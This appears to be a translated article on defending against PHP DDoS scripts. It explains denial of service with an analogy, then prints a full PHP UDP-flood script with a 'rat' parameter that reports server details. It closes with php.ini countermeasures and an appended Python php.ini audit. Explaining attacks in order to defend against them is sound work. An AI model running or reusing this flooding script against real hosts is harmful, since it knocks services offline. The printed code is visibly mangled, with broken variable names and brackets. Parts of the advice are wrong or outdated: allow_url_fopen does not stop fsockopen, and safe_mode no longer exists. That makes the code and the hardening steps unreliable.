First Look at DDoS: A distributed denial of service (DDoS) attack uses client/server technology to combine multiple computers into an attack platform that launches a DDoS attack on one or more targets, thereby multiplying the power of a denial of service attack. Typically, an attacker uses a stolen account to install a DDoS master program on one computer. At a set time the master communicates with a large number of agents, which have already been installed on many computers on the network. An agent launches an attack when it receives an instruction. With client/server technology, the master program can activate hundreds of agents within seconds.
An analogy helps in understanding what DDoS is.
What would a gang of bullies do if they wanted to keep a rival shop across the street from operating normally? (This is only an example; do not imitate it.) Disguised as ordinary customers, the bullies crowd into the rival's shop and refuse to leave, so real shoppers cannot get in. Or they keep the salespeople busy with idle chatter, so that staff cannot serve customers normally. Or they feed the shop's operators false information, so that the whole shop is thrown into a frenzy only to find that it was all for nothing; in the end the real big customers are driven away and the losses are heavy. Bullies also sometimes find such things hard to accomplish alone and need to call in many others. DoS and DDoS attacks in the cyber security world follow the same ideas.
This article describes how to deal with DDoS attacks launched from PHP. It analyzes how a PHP DDoS script works and gives targeted countermeasures; readers who need them can use it as a reference.
First look at the source code, which is as follows:
<?php Set_time_limit (999999); $host = $_get[' host ']; $port = $_get[' Port ']; $exec _time = $_get[' time '); $Sendlen = 65535; $packets = 0; Ignore_user_abort (True); if (StrLen ($host) ==0 or StrLen ($port) ==0 or StrLen ($exec _time) ==0) {if (StrLen ($_get[' rat ']) <>0) { echo $_get[' rat '].$_server["Http_host"]. "|". gethostbyname ($_server[' server_name '). "|". Php_uname (). "|". $_server[' server_software '].$_get[' rat '; Exit } echo "Parameters can not be empty!"; Exit } for ($i =0; $i < $Sendlen; $i + +) {$out. = "A"; } $max _time = time () + $exec _time; while (1) {$packets + +; if (Time () > $max _time) {break; } $fp = Fsockopen ("udp://$host", $port, $errno, $ERRSTR, 5); if ($fp) {fwrite ($fp, $out); Fclose ($FP); }} echo "Send Host: $host: $port <br><br>"; echo "Send Flow: $packets * ($Sendlen/1024=". Round ($Sendlen/1024, 2). ") kb/1024 =". Round$packets * $Sendlen/1024/1024, 2). "Mb<br><br>"; echo "Send rate:". Round ($packets/$exec _time, 2). "PACKS/S;". Round ($packets/$exec _time* $Sendlen/1024/1024, 2). "MB/s";?>
The key code is as follows:
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
The method is very simple: send UDP packets to the target host inside an infinite loop, which puts a heavy load on it.
This load falls first on the server that executes the script, because the script consumes a large share of that server's own network bandwidth, CPU and other resources. To put pressure on a target site with this script, it has to be executed on multiple servers, which is what makes it DDoS. Since the script uses fsockopen to make outbound requests, the fix is to not let it make them.
In php.ini, set the following:
allow_url_fopen = Off
If the script can still send packets after that, find the following line:
extension=php_sockets.dll
Change it to
;extension=php_sockets.dll
Restart Apache, IIS, or Nginx to prevent the PHP DDoS script from sending packets.
Another netizen said that stopping the script from setting itself to never time out is very simple:
1. Disable the set_time_limit function.
2. Enable PHP safe mode (safe_mode = On).
To disable socket functionality, you can disable the socket module directly or disable the fsockopen function. Because sockets are often used to send back passwords, it is recommended to turn on safe mode directly instead. In that case the script times out every 30 seconds, and it is unlikely that any "hacker" would be lonely enough to click every 30 seconds to start the DDoS.
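An added example, not part of the original article: a small Python audit of php.ini text for the settings discussed above. It also checks disable_functions for fsockopen (the call the script depends on, which is a core PHP function rather than part of the sockets extension) and for pfsockopen, its persistent variant. The sample php.ini contents, the function list and the finding messages are constructed for this illustration.

```python
import re

# Functions the script above relies on; pfsockopen is added here as an assumption.
RISKY_FUNCS = ("fsockopen", "pfsockopen", "set_time_limit")

# Constructed sample inputs, not taken from a real server.
SAMPLE_WEAK = "[PHP]\nallow_url_fopen = On\nextension=php_sockets.dll\ndisable_functions =\n"
SAMPLE_HARDENED = ("[PHP]\nallow_url_fopen = Off\n;extension=php_sockets.dll\n"
                   "disable_functions = fsockopen, pfsockopen, set_time_limit\n")

def parse_ini(text):
    """Return (settings, extensions) from php.ini text; later lines override earlier ones."""
    settings, extensions = {}, []
    for raw in text.splitlines():
        # ';' starts a comment in php.ini (quoted values containing ';' are not handled here)
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        value = value.strip("\"'")
        if key.lower() == "extension":
            extensions.append(value.lower())
        else:
            settings[key.lower()] = value
    return settings, extensions

def audit(text):
    """Return a list of findings for the hardening steps discussed above."""
    settings, extensions = parse_ini(text)
    findings = []
    # PHP's built-in default for allow_url_fopen is On, so a missing line counts as enabled.
    if settings.get("allow_url_fopen", "1").lower() in ("1", "on", "true", "yes"):
        findings.append("allow_url_fopen is enabled")
    # Matches php_sockets.dll (Windows), sockets.so and the bare name "sockets".
    if any(re.fullmatch(r"(php_)?sockets(\.dll|\.so)?", ext) for ext in extensions):
        findings.append("sockets extension is loaded")
    disabled = {f.strip().lower() for f in settings.get("disable_functions", "").split(",")}
    for func in RISKY_FUNCS:
        if func not in disabled:
            findings.append(f"{func} is not in disable_functions")
    return findings

if __name__ == "__main__":
    for name, ini in (("weak", SAMPLE_WEAK), ("hardened", SAMPLE_HARDENED)):
        print(name, audit(ini) or "no findings")
```

safe_mode is not checked because it was removed in PHP 5.4. Run the audit against the php.ini that the web server's PHP actually loads, since the CLI and the web SAPI can use different files.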